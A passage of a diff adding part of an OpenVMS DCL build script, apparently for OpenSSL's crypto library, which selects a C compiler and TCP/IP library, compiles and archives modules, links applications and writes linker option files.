+$ IF TMP_FILE_NAME .EQS. "]" THEN TMP_FILE_NAME = FILE_NAME
+$ IF F$ELEMENT(0,".",TMP_FILE_NAME) .EQS. TMP_FILE_NAME THEN -
+	FILE_NAME = FILE_NAME + ".c"
+$ IF (MODULE_NAME.NES."")
+$ THEN
+$   SOURCE_FILE = "SYS$DISK:[." + MODULE_NAME+ "]" + FILE_NAME
+$ ELSE
+$   SOURCE_FILE = "SYS$DISK:[]" + FILE_NAME
+$ ENDIF
+$ SOURCE_FILE = SOURCE_FILE - "]["
+$!
+$! Create The Object File Name.
+$!
+$ OBJECT_FILE = OBJ_DIR + F$PARSE(FILE_NAME,,,"NAME","SYNTAX_ONLY") + ".OBJ"
+$ ON WARNING THEN GOTO NEXT_FILE
+$!
+$! Check To See If The File We Want To Compile Is Actually There.
+$!
+$ IF (F$SEARCH(SOURCE_FILE).EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Doesn't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File ",SOURCE_FILE," Doesn't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   GOTO EXIT
+$!
+$! End The File Exist Check.
+$!
+$ ENDIF
+$!
+$! Tell The User We Are Compiling The File.
+$!
+$ IF (MODULE_NAME.EQS."")
+$ THEN
+$   WRITE SYS$OUTPUT "Compiling The ",FILE_NAME," File.  (",BUILDALL,",",STATE,")"
+$ ENDIF
+$ IF (MODULE_NAME.NES."")
+$ THEN 
+$   WRITE SYS$OUTPUT "        ",FILE_NAME,""
+$ ENDIF
+$!
+$! Compile The File.
+$!
+$ ON ERROR THEN GOTO NEXT_FILE
+$ FILE_NAME0 = ","+ F$ELEMENT(0,".",FILE_NAME)+ ","
+$ IF FILE_NAME - ".mar" .NES. FILE_NAME
+$ THEN
+$   MACRO/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$ ELSE
+$   IF COMPILEWITH_CC3 - FILE_NAME0 .NES. COMPILEWITH_CC3
+$   THEN
+$     write sys$output "        \Using special rule (3)"
+$     if (.not. CC3_SHOWN)
+$     then
+$       CC3_SHOWN = 1
+$       x = "    "+ CC3
+$       write /symbol sys$output x
+$     endif
+$     CC3/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$   ELSE
+$     IF COMPILEWITH_CC4 - FILE_NAME0 .NES. COMPILEWITH_CC4
+$     THEN
+$       write /symbol sys$output "        \Using special rule (4)"
+$       if (.not. CC4_SHOWN)
+$       then
+$         CC4_SHOWN = 1
+$         x = "    "+ CC4
+$         write /symbol sys$output x
+$       endif
+$       CC4/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$     ELSE
+$       IF CC5_DIFFERENT .AND. -
+         (COMPILEWITH_CC5 - FILE_NAME0 .NES. COMPILEWITH_CC5)
+$       THEN
+$         write sys$output "        \Using special rule (5)"
+$         if (.not. CC5_SHOWN)
+$         then
+$           CC5_SHOWN = 1
+$           x = "    "+ CC5
+$           write /symbol sys$output x
+$         endif
+$         CC5/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$       ELSE
+$         IF COMPILEWITH_CC6 - FILE_NAME0 .NES. COMPILEWITH_CC6
+$         THEN
+$           write sys$output "        \Using special rule (6)"
+$           if (.not. CC6_SHOWN)
+$           then
+$             CC6_SHOWN = 1
+$             x = "    "+ CC6
+$             write /symbol sys$output x
+$           endif
+$           CC6/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$         ELSE
+$           CC/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$         ENDIF
+$       ENDIF
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$ IF STATE .EQS. "LIB"
+$ THEN 
+$!
+$!   Add It To The Library.
+$!
+$   LIBRARY/REPLACE 'LIB_NAME' 'OBJECT_FILE'
+$!
+$!   Time To Clean Up The Object File.
+$!
+$   DELETE 'OBJECT_FILE';*
+$ ENDIF
+$!
+$! Go Back And Do It Again.
+$!
+$ GOTO NEXT_FILE
+$!
+$! All Done With This Library Part.
+$!
+$ FILE_DONE:
+$!
+$! Time To Build Some Applications
+$!
+$ IF F$TYPE('APPS_MODULE') .NES. "" .AND. BUILDALL .NES. "LIBRARY"
+$ THEN
+$   APPLICATION_COUNTER = 0
+$ NEXT_APPLICATION:
+$   APPLICATION = F$ELEMENT(APPLICATION_COUNTER,";",'APPS_MODULE')
+$   IF APPLICATION .EQS. ";" THEN GOTO APPLICATION_DONE
+$
+$   APPLICATION_COUNTER = APPLICATION_COUNTER + 1
+$   APPLICATION_OBJECTS = F$ELEMENT(1,"/",APPLICATION)
+$   APPLICATION = F$ELEMENT(0,"/",APPLICATION)
+$
+$!   WRITE SYS$OUTPUT "DEBUG: SHOW SYMBOL APPLICATION*"
+$!   SHOW SYMBOL APPLICATION*
+$!
+$! Tell the user what happens
+$!
+$   WRITE SYS$OUTPUT "        ",APPLICATION,".exe"
+$!
+$! Link The Program.
+$!
+$   ON ERROR THEN GOTO NEXT_APPLICATION
+$!
+$!  Link With A TCP/IP Library.
+$!
+$   LINK /'DEBUGGER' /'LINKMAP' /'TRACEBACK' -
+     /EXE='EXE_DIR''APPLICATION'.EXE -
+     'OBJ_DIR''APPLICATION_OBJECTS', -
+     'CRYPTO_LIB'/LIBRARY -
+     'TCPIP_LIB' -
+     'ZLIB_LIB' -
+     ,'OPT_FILE' /OPTIONS
+$!
+$   GOTO NEXT_APPLICATION
+$  APPLICATION_DONE:
+$ ENDIF
+$!
+$! Go Back And Get The Next Module.
+$!
+$ GOTO MODULE_NEXT
+$!
+$! All Done With This Module.
+$!
+$ MODULE_DONE:
+$!
+$! Tell The User That We Are All Done.
+$!
+$ WRITE SYS$OUTPUT "All Done..."
+$ EXIT:
+$ GOSUB CLEANUP
+$ EXIT
+$!
+$! Check For The Link Option FIle.
+$!
+$ CHECK_OPT_FILE:
+$!
+$! Check To See If We Need To Make A VAX C Option File.
+$!
+$ IF (COMPILER.EQS."VAXC")
+$ THEN
+$!
+$!  Check To See If We Already Have A VAX C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A VAX C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable VAX C Runtime Library.
+!
+SYS$SHARE:VAXCRTL.EXE/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The VAXC Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A GNU C Option File.
+$!
+$ IF (COMPILER.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If We Already Have A GNU C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A GNU C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable C Runtime Library.
+!
+GNU_CC:[000000]GCCLIB/LIBRARY
+SYS$SHARE:VAXCRTL/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The GNU C Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A DEC C Option File.
+$!
+$ IF (COMPILER.EQS."DECC")
+$ THEN
+$!
+$!  Check To See If We Already Have A DEC C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    Figure Out If We Need A non-VAX Or A VAX Linker Option File.
+$!
+$     IF ARCH .EQS. "VAX"
+$     THEN
+$!
+$!      We Need A DEC C Linker Option File For VAX.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable DEC C Runtime Library.
+!
+SYS$SHARE:DECC$SHR.EXE/SHARE
+$EOD
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Create The non-VAX Linker Option File.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File For non-VAX To Link Against 
+! The Sharable C Runtime Library.
+!
+SYS$SHARE:CMA$OPEN_LIB_SHR/SHARE
+SYS$SHARE:CMA$OPEN_RTL/SHARE
+$EOD
+$!
+$!    End The DEC C Option File Check.
+$!
+$     ENDIF
+$!
+$!  End The Option File Search.
+$!
+$   ENDIF
+$!
+$! End The DEC C Check.
+$!
+$ ENDIF
+$!
+$!  Tell The User What Linker Option File We Are Using.
+$!
+$ WRITE SYS$OUTPUT "Using Linker Option File ",OPT_FILE,"."
+$!
+$! Time To RETURN.
+$!
+$ RETURN
+$!
+$! Check The User's Options.
+$!
+$ CHECK_OPTIONS:
+$!
+$! Check To See If P1 Is Blank.
+$!
+$ IF (P1.EQS."ALL")
+$ THEN
+$!
+$!   P1 Is Blank, So Build Everything.
+$!
+$    BUILDALL = "TRUE"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Else, Check To See If P1 Has A Valid Argument.
+$!
+$   IF (P1.EQS."LIBRARY").OR.(P1.EQS."APPS")
+$   THEN
+$!
+$!    A Valid Argument.
+$!
+$     BUILDALL = P1
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Tell The User We Don't Know What They Want.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P1," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALL      :  Just Build Everything."
+$     WRITE SYS$OUTPUT "    LIBRARY  :  To Compile Just The [.xxx.EXE.CRYPTO]LIBCRYPTO.OLB Library."
+$     WRITE SYS$OUTPUT "    APPS     :  To Compile Just The [.xxx.EXE.CRYPTO]*.EXE Programs."
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT " Where 'xxx' Stands For:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALPHA[64]:  Alpha Architecture."
+$     WRITE SYS$OUTPUT "    IA64[64] :  IA64 Architecture."
+$     WRITE SYS$OUTPUT "    VAX      :  VAX Architecture."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P1 Check.
+$!
+$ ENDIF
+$!
+$! Check To See If P2 Is Blank.
+$!
+$ IF (P2.EQS."NODEBUG")
+$ THEN
+$!
+$!  P2 Is NODEBUG, So Compile Without The Debugger Information.
+$!
+$   DEBUGGER = "NODEBUG"
+$   LINKMAP = "NOMAP"
+$   TRACEBACK = "NOTRACEBACK" 
+$   GCC_OPTIMIZE = "OPTIMIZE"
+$   CC_OPTIMIZE = "OPTIMIZE"
+$   MACRO_OPTIMIZE = "OPTIMIZE"
+$   WRITE SYS$OUTPUT "No Debugger Information Will Be Produced During Compile."
+$   WRITE SYS$OUTPUT "Compiling With Compiler Optimization."
+$ ELSE
+$!
+$!  Check To See If We Are To Compile With Debugger Information.
+$!
+$   IF (P2.EQS."DEBUG")
+$   THEN
+$!
+$!    Compile With Debugger Information.
+$!
+$     DEBUGGER = "DEBUG"
+$     LINKMAP = "MAP"
+$     TRACEBACK = "TRACEBACK"
+$     GCC_OPTIMIZE = "NOOPTIMIZE"
+$     CC_OPTIMIZE = "NOOPTIMIZE"
+$     MACRO_OPTIMIZE = "NOOPTIMIZE"
+$     WRITE SYS$OUTPUT "Debugger Information Will Be Produced During Compile."
+$     WRITE SYS$OUTPUT "Compiling Without Compiler Optimization."
+$   ELSE 
+$!
+$!    They Entered An Invalid Option.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P2," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "     DEBUG   :  Compile With The Debugger Information."
+$     WRITE SYS$OUTPUT "     NODEBUG :  Compile Without The Debugger Information."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P2 Check.
+$!
+$ ENDIF
+$!
+$! Special Threads For OpenVMS v7.1 Or Later
+$!
+$! Written By:  Richard Levitte
+$!              richard@levitte.org
+$!
+$!
+$! Check To See If We Have A Option For P5.
+$!
+$ IF (P5.EQS."")
+$ THEN
+$!
+$!  Get The Version Of VMS We Are Using.
+$!
+$   ISSEVEN :=
+$   TMP = F$ELEMENT(0,"-",F$EXTRACT(1,4,F$GETSYI("VERSION")))
+$   TMP = F$INTEGER(F$ELEMENT(0,".",TMP)+F$ELEMENT(1,".",TMP))
+$!
+$!  Check To See If The VMS Version Is v7.1 Or Later.
+$!
+$   IF (TMP.GE.71)
+$   THEN
+$!
+$!    We Have OpenVMS v7.1 Or Later, So Use The Special Threads.
+$!
+$     ISSEVEN := ,PTHREAD_USE_D4
+$!
+$!  End The VMS Version Check.
+$!
+$   ENDIF
+$!
+$! End The P5 Check.
+$!
+$ ENDIF
+$!
+$! Check P7 (POINTER_SIZE).
+$!
+$ IF (P7 .NES. "") .AND. (ARCH .NES. "VAX")
+$ THEN
+$!
+$   IF (P7 .EQS. "32")
+$   THEN
+$     POINTER_SIZE = " /POINTER_SIZE=32"
+$   ELSE
+$     POINTER_SIZE = F$EDIT( P7, "COLLAPSE, UPCASE")
+$     IF ((POINTER_SIZE .EQS. "64") .OR. -
+       (POINTER_SIZE .EQS. "64=") .OR. -
+       (POINTER_SIZE .EQS. "64=ARGV"))
+$     THEN
+$       ARCHD = ARCH+ "_64"
+$       LIB32 = ""
+$       POINTER_SIZE = " /POINTER_SIZE=64"
+$     ELSE
+$!
+$!      Tell The User Entered An Invalid Option.
+$!
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", P7, -
+         " Is Invalid.  The Valid Options Are:"
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT -
+         "    """"       :  Compile with default (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    32       :  Compile with 32-bit (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    64       :  Compile with 64-bit (long) pointers (auto ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=      :  Compile with 64-bit (long) pointers (no ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=ARGV  :  Compile with 64-bit (long) pointers (ARGV)."
+$       WRITE SYS$OUTPUT ""
+$! 
+$!      Time To EXIT.
+$!
+$       EXIT
+$!
+$     ENDIF
+$!
+$   ENDIF
+$!
+$! End The P7 (POINTER_SIZE) Check.
+$!
+$ ENDIF
+$!
+$! Set basic C compiler /INCLUDE directories.
+$!
+$ CC_INCLUDES = "SYS$DISK:[.''ARCHD'],SYS$DISK:[],SYS$DISK:[-],"+ -
+   "SYS$DISK:[.ENGINE.VENDOR_DEFNS],SYS$DISK:[.MODES],SYS$DISK:[.ASN1],SYS$DISK:[.EVP]"
+$!
+$! Check To See If P3 Is Blank.
+$!
+$ IF (P3.EQS."")
+$ THEN
+$!
+$!  O.K., The User Didn't Specify A Compiler, Let's Try To
+$!  Find Out Which One To Use.
+$!
+$!  Check To See If We Have GNU C.
+$!
+$   IF (F$TRNLNM("GNU_CC").NES."")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     P3 = "GNUC"
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Check To See If We Have VAXC Or DECC.
+$!
+$     IF (ARCH.NES."VAX").OR.(F$TRNLNM("DECC$CC_DEFAULT").NES."")
+$     THEN 
+$!
+$!      Looks Like DECC, Set To Use DECC.
+$!
+$       P3 = "DECC"
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Looks Like VAXC, Set To Use VAXC.
+$!
+$       P3 = "VAXC"
+$!
+$!    End The VAXC Compiler Check.
+$!
+$     ENDIF
+$!
+$!  End The DECC & VAXC Compiler Check.
+$!
+$   ENDIF
+$!
+$!  End The Compiler Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Have A Option For P4.
+$!
+$ IF (P4.EQS."")
+$ THEN
+$!
+$!  Find out what socket library we have available
+$!
+$   IF F$PARSE("SOCKETSHR:") .NES. ""
+$   THEN
+$!
+$!    We have SOCKETSHR, and it is my opinion that it's the best to use.
+$!
+$     P4 = "SOCKETSHR"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using SOCKETSHR for TCP/IP"
+$!
+$!    Else, let's look for something else
+$!
+$   ELSE
+$!
+$!    Like UCX (the reason to do this before Multinet is that the UCX
+$!    emulation is easier to use...)
+$!
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. "" -
+	 .OR. F$PARSE("SYS$SHARE:UCX$IPC_SHR.EXE") .NES. "" -
+	 .OR. F$PARSE("SYS$LIBRARY:UCX$IPC.OLB") .NES. ""
+$     THEN
+$!
+$!	Last resort: a UCX or UCX-compatible library
+$!
+$	P4 = "UCX"
+$!
+$!      Tell the user
+$!
+$       WRITE SYS$OUTPUT "Using UCX or an emulation thereof for TCP/IP"
+$!
+$!	That was all...
+$!
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$!
+$! Set Up Initial CC Definitions, Possibly With User Ones
+$!
+$ CCDEFS = "TCPIP_TYPE_''P4',DSO_VMS"
+$ IF F$TYPE(USER_CCDEFS) .NES. "" THEN CCDEFS = CCDEFS + "," + USER_CCDEFS
+$ CCEXTRAFLAGS = ""
+$ IF F$TYPE(USER_CCFLAGS) .NES. "" THEN CCEXTRAFLAGS = USER_CCFLAGS
+$ CCDISABLEWARNINGS = "" !!! "MAYLOSEDATA3" !!! "LONGLONGTYPE,LONGLONGSUFX,FOUNDCR"
+$ IF F$TYPE(USER_CCDISABLEWARNINGS) .NES. ""
+$ THEN
+$     IF CCDISABLEWARNINGS .NES. THEN CCDISABLEWARNINGS = CCDISABLEWARNINGS + ","
+$     CCDISABLEWARNINGS = CCDISABLEWARNINGS + USER_CCDISABLEWARNINGS
+$ ENDIF
+$!
+$! Check To See If We Have A ZLIB Option.
+$!
+$ ZLIB = P8
+$ IF (ZLIB .NES. "")
+$ THEN
+$!
+$!  Check for expected ZLIB files.
+$!
+$   err = 0
+$   file1 = f$parse( "zlib.h", ZLIB, , , "SYNTAX_ONLY")
+$   if (f$search( file1) .eqs. "")
+$   then
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     WRITE SYS$OUTPUT "    Can't find header: ''file1'"
+$     err = 1
+$   endif
+$   file1 = f$parse( "A.;", ZLIB)- "A.;"
+$!
+$   file2 = f$parse( ZLIB, "libz.olb", , , "SYNTAX_ONLY")
+$   if (f$search( file2) .eqs. "")
+$   then
+$     if (err .eq. 0)
+$     then
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     endif
+$     WRITE SYS$OUTPUT "    Can't find library: ''file2'"
+$     WRITE SYS$OUTPUT ""
+$     err = err+ 2
+$   endif
+$   if (err .eq. 1)
+$   then
+$     WRITE SYS$OUTPUT ""
+$   endif
+$!
+$   if (err .ne. 0)
+$   then
+$     EXIT
+$   endif
+$!
+$   CCDEFS = """ZLIB=1"", "+ CCDEFS
+$   CC_INCLUDES = CC_INCLUDES+ ", "+ file1
+$   ZLIB_LIB = ", ''file2' /library"
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "ZLIB library spec: ", file2
+$!
+$! End The ZLIB Check.
+$!
+$ ENDIF
+$!
+$!  Check To See If The User Entered A Valid Parameter.
+$!
+$ IF (P3.EQS."VAXC").OR.(P3.EQS."DECC").OR.(P3.EQS."GNUC")
+$ THEN
+$!
+$!    Check To See If The User Wanted DECC.
+$!
+$   IF (P3.EQS."DECC")
+$   THEN
+$!
+$!    Looks Like DECC, Set To Use DECC.
+$!
+$     COMPILER = "DECC"
+$!
+$!    Tell The User We Are Using DECC.
+$!
+$     WRITE SYS$OUTPUT "Using DECC 'C' Compiler."
+$!
+$!    Use DECC...
+$!
+$     CC = "CC"
+$     IF ARCH.EQS."VAX" .AND. F$TRNLNM("DECC$CC_DEFAULT").NES."/DECC" -
+	 THEN CC = "CC/DECC"
+$     CC = CC + " /''CC_OPTIMIZE' /''DEBUGGER' /STANDARD=RELAXED"+ -
+       "''POINTER_SIZE' /NOLIST /PREFIX=ALL" + -
+       " /INCLUDE=(''CC_INCLUDES')"+ -
+       CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_DECC_OPTIONS.OPT"
+$!
+$!  End DECC Check.
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use VAXC.
+$!
+$   IF (P3.EQS."VAXC")
+$   THEN
+$!
+$!    Looks Like VAXC, Set To Use VAXC.
+$!
+$     COMPILER = "VAXC"
+$!
+$!    Tell The User We Are Using VAX C.
+$!
+$     WRITE SYS$OUTPUT "Using VAXC 'C' Compiler."
+$!
+$!    Compile Using VAXC.
+$!
+$     CC = "CC"
+$     IF ARCH.NES."VAX"
+$     THEN
+$	WRITE SYS$OUTPUT "There is no VAX C on ''ARCH'!"
+$	EXIT
+$     ENDIF
+$     IF F$TRNLNM("DECC$CC_DEFAULT").EQS."/DECC" THEN CC = "CC/VAXC"
+$     CC = CC + "/''CC_OPTIMIZE'/''DEBUGGER'/NOLIST" + -
+       "/INCLUDE=(''CC_INCLUDES')"+ -
+	   CCEXTRAFLAGS
+$     CCDEFS = """VAXC""," + CCDEFS
+$!
+$!    Define <sys> As SYS$COMMON:[SYSLIB]
+$!
+$     DEFINE/NOLOG SYS SYS$COMMON:[SYSLIB]
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_VAXC_OPTIONS.OPT"
+$!
+$!  End VAXC Check
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use GNU C.
+$!
+$   IF (P3.EQS."GNUC")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     COMPILER = "GNUC"
+$!
+$!    Tell The User We Are Using GNUC.
+$!
+$     WRITE SYS$OUTPUT "Using GNU 'C' Compiler."
+$!
+$!    Use GNU C...
+$!
+$     CC = "GCC/NOCASE_HACK/''GCC_OPTIMIZE'/''DEBUGGER'/NOLIST" + -
+       "/INCLUDE=(''CC_INCLUDES')"+ -
+	   CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_GNUC_OPTIONS.OPT"
+$!
+$!  End The GNU C Check.
+$!
+$   ENDIF
+$!
+$!  Set up default defines
+$!
+$   CCDEFS = """FLAT_INC=1""," + CCDEFS
+$!
+$!  Finish up the definition of CC.
+$!
+$   IF COMPILER .EQS. "DECC"
+$   THEN
+$!    Not all compiler versions support MAYLOSEDATA3.
+$     OPT_TEST = "MAYLOSEDATA3"
+$     DEFINE /USER_MODE SYS$ERROR NL:
+$     DEFINE /USER_MODE SYS$OUTPUT NL:
+$     'CC' /NOCROSS_REFERENCE /NOLIST /NOOBJECT -
+       /WARNINGS = DISABLE = ('OPT_TEST', EMPTYFILE) NL:
+$     IF ($SEVERITY)
+$     THEN
+$       IF CCDISABLEWARNINGS .NES. "" THEN -
+         CCDISABLEWARNINGS = CCDISABLEWARNINGS+ ","
+$       CCDISABLEWARNINGS = CCDISABLEWARNINGS+ OPT_TEST
+$     ENDIF
+$     IF CCDISABLEWARNINGS .EQS. ""
+$     THEN
+$       CC4DISABLEWARNINGS = "DOLLARID"
+$       CC6DISABLEWARNINGS = "MIXLINKAGE"
+$     ELSE
+$       CC4DISABLEWARNINGS = CCDISABLEWARNINGS + ",DOLLARID"
+$       CC6DISABLEWARNINGS = CCDISABLEWARNINGS + ",MIXLINKAGE"
+$       CCDISABLEWARNINGS = " /WARNING=(DISABLE=(" + CCDISABLEWARNINGS + "))"
+$     ENDIF
+$     CC4DISABLEWARNINGS = " /WARNING=(DISABLE=(" + CC4DISABLEWARNINGS + "))"
+$     CC6DISABLEWARNINGS = " /WARNING=(DISABLE=(" + CC6DISABLEWARNINGS + "))"
+$   ELSE
+$     CCDISABLEWARNINGS = ""
+$     CC4DISABLEWARNINGS = ""
+$     CC6DISABLEWARNINGS = ""
+$   ENDIF
+$   CC3 = CC + " /DEFINE=(" + CCDEFS + ISSEVEN + ")" + CCDISABLEWARNINGS
+$   CC = CC + " /DEFINE=(" + CCDEFS + ")" + CCDISABLEWARNINGS
+$   IF ARCH .EQS. "VAX" .AND. COMPILER .EQS. "DECC" .AND. P2 .NES. "DEBUG"
+$   THEN
+$     CC5 = CC + " /OPTIMIZE=NODISJOINT"
+$     CC5_DIFFERENT = 1
+$   ELSE
+$     CC5 = CC
+$     CC5_DIFFERENT = 0
+$   ENDIF
+$   CC4 = CC - CCDISABLEWARNINGS + CC4DISABLEWARNINGS
+$   CC6 = CC - CCDISABLEWARNINGS + CC6DISABLEWARNINGS
+$!
+$!  Show user the result
+$!
+$   WRITE/SYMBOL SYS$OUTPUT "Main C Compiling Command: ",CC
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P3," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    VAXC  :  To Compile With VAX C."
+$   WRITE SYS$OUTPUT "    DECC  :  To Compile With DEC C."
+$   WRITE SYS$OUTPUT "    GNUC  :  To Compile With GNU C."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$!
+$! End The Valid Argument Check.
+$!
+$ ENDIF
+$!
+$! Build a MACRO command for the architecture at hand
+$!
+$ IF ARCH .EQS. "VAX" THEN MACRO = "MACRO/''DEBUGGER'"
+$ IF ARCH .NES. "VAX" THEN MACRO = "MACRO/MIGRATION/''DEBUGGER'/''MACRO_OPTIMIZE'"
+$!
+$!  Show user the result
+$!
+$   WRITE/SYMBOL SYS$OUTPUT "Main MACRO Compiling Command: ",MACRO
+$!
+$! Time to check the contents, and to make sure we get the correct library.
+$!
+$ IF P4.EQS."SOCKETSHR" .OR. P4.EQS."MULTINET" .OR. P4.EQS."UCX" -
+     .OR. P4.EQS."TCPIP" .OR. P4.EQS."NONE"
+$ THEN
+$!
+$!  Check to see if SOCKETSHR was chosen
+$!
+$   IF P4.EQS."SOCKETSHR"
+$   THEN
+$!
+$!    Set the library to use SOCKETSHR
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]SOCKETSHR_SHR.OPT /OPTIONS"
+$!
+$!    Done with SOCKETSHR
+$!
+$   ENDIF
+$!
+$!  Check to see if MULTINET was chosen
+$!
+$   IF P4.EQS."MULTINET"
+$   THEN
+$!
+$!    Set the library to use UCX emulation.
+$!
+$     P4 = "UCX"
+$!
+$!    Done with MULTINET
+$!
+$   ENDIF
+$!
+$!  Check to see if UCX was chosen
+$!
+$   IF P4.EQS."UCX"
+$   THEN
+$!
+$!    Set the library to use UCX.
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC.OPT /OPTIONS"
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. ""
+$     THEN
+$       TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC_LOG.OPT /OPTIONS"
+$     ELSE
+$       IF COMPILER .NES. "DECC" .AND. ARCH .EQS. "VAX" THEN -
+	  TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_VAXC.OPT /OPTIONS"
+$     ENDIF
+$!
+$!    Done with UCX
+$!
+$   ENDIF
+$!
+$!  Check to see if TCPIP was chosen
+$!
+$   IF P4.EQS."TCPIP"
+$   THEN
+$!
+$!    Set the library to use TCPIP (post UCX).
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]TCPIP_SHR_DECC.OPT /OPTIONS"
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Check to see if NONE was chosen
+$!
+$   IF P4.EQS."NONE"
+$   THEN
+$!
+$!    Do not use a TCPIP library.
+$!
+$     TCPIP_LIB = ""
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "TCP/IP library spec: ", TCPIP_LIB- ","
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P4," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    SOCKETSHR  :  To link with SOCKETSHR TCP/IP library."
+$   WRITE SYS$OUTPUT "    UCX        :  To link with UCX TCP/IP library."
+$   WRITE SYS$OUTPUT "    TCPIP      :  To link with TCPIP (post UCX) TCP/IP library."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$!
+$!  Done with TCP/IP libraries
+$!
+$ ENDIF
+$!
+$! Check if the user wanted to compile just a subset of all the encryption
+$! methods.
+$!
+$ IF P6 .NES. ""
+$ THEN
+$   ENCRYPT_TYPES = P6
+$ ENDIF
+$!
+$!  Time To RETURN...
+$!
+$ RETURN
+$!
+$ INITIALISE:
+$!
+$! Save old value of the logical name OPENSSL
+$!
+$ __SAVE_OPENSSL = F$TRNLNM("OPENSSL","LNM$PROCESS_TABLE")
+$!
+$! Save directory information
+$!
+$ __HERE = F$PARSE(F$PARSE("A.;",F$ENVIRONMENT("PROCEDURE"))-"A.;","[]A.;") - "A.;"
